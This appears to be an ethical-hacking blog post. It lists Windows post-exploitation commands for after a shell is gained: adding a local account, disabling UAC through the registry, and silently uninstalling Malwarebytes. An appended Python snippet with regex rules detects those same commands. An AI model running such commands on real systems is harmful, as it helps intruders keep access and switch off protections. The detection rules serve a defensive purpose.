Ethical Hacking

Ethical hacking is the process of attempting to bypass an organization's security system in order to find any weaknesses or vulnerabilities that could be exploited by a real malicious hacker. The information discovered and gathered during ethical hacking can help an organization improve its security posture by highlighting security holes that need to be patched.

For ethical hacking to be ethical, the ethical hacker must have explicit written permission to attempt to exploit the security system. The ethical hacker must also agree to disclose to the organization all vulnerabilities found so that the organization may fix them. Without permission from the organization and this agreement, any hacking activity would definitely be considered unethical and possibly criminal.

Useful Windows Commands

So after we’ve gained our first shell we’ll need to execute a series of commands on the compromised system in order to gain further control and solidify our footprint.  The following are some of the more common Windows commands in no particular order.  I’ll keep updating this list as needed 🙂

CREATE NEW ACCOUNT 

net user /add username password

or alternatively if you do not want to enter the password in plain text, run the following:

net user /add username *

and then enter the password in twice when prompted at the command line

SEE CURRENT USER

whoami

SEE CURRENT USER’S PERMISSIONS 

whoami /PRIV

SEE LOCAL ADMIN GROUP MEMBERS 

net localgroup administrators

SEE LOCAL USERS GROUP MEMBERS

net localgroup users

REMOTE SHUTDOWN OR RESTART 

shutdown -r -m \\computername

CONFIGURING UAC

Disable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Enable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

SEEING INSTALLED APPLICATIONS

wmic product get Name

(this will enumerate all installed software on the system)

To narrow these results or check for specific applications try playing with the following:

wmic product where "Name like '%Malwarebytes%'" get Name, Version

wmic product where "Name='Malwarebytes'" get Name, Version

TO UNINSTALL APPLICATIONS SILENTLY

wmic product where "Name='Malwarebytes'" call uninstall /nointeractive
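From the defender's side, the account creation, UAC and uninstall commands above leave recognizable command lines in process-creation logging (for example Security event 4688 with command-line auditing enabled, or Sysmon event 1). The following is an added example, not part of the original post, that flags them; the rule names, record fields and sample records are constructed for illustration.

```python
import re

# Hypothetical rule names; each pattern matches one command family listed on this page.
RULES = {
    "local_account_created": re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I),
    "uac_disabled": re.compile(
        r"\breg(\.exe)?\s+add\b.*\\Policies\\System\b.*/v\s+EnableLUA\b.*/d\s+0\b", re.I),
    "silent_uninstall": re.compile(
        r"\bwmic(\.exe)?\s+product\b.*\bcall\s+uninstall\b", re.I),
}

UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Constructed process-creation records (host and field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": "net user /add username password"},
    {"host": "WS01", "command_line": "net localgroup administrators"},
    {"host": "WS01", "command_line":
        r"C:\Windows\System32\reg.exe ADD " + UAC_KEY + " /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"host": "WS01", "command_line":
        "reg.exe ADD " + UAC_KEY + " /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"host": "WS02", "command_line": "wmic product get Name"},
    {"host": "WS02", "command_line":
        """wmic product where "Name='Malwarebytes'" call uninstall /nointeractive"""},
]


def triage(events):
    """Return (host, rule, command_line) for each record matching a rule."""
    hits = []
    for event in events:
        cmd = event["command_line"]
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                hits.append((event["host"], rule, cmd))
    return hits


if __name__ == "__main__":
    for host, rule, cmd in triage(SAMPLE_EVENTS):
        print(f"{host}  {rule:<22} {cmd}")
```

Read-only enumeration (`net localgroup`, `wmic product get`) and re-enabling UAC (`/d 1`) are deliberately left unflagged here; only the state-changing commands match.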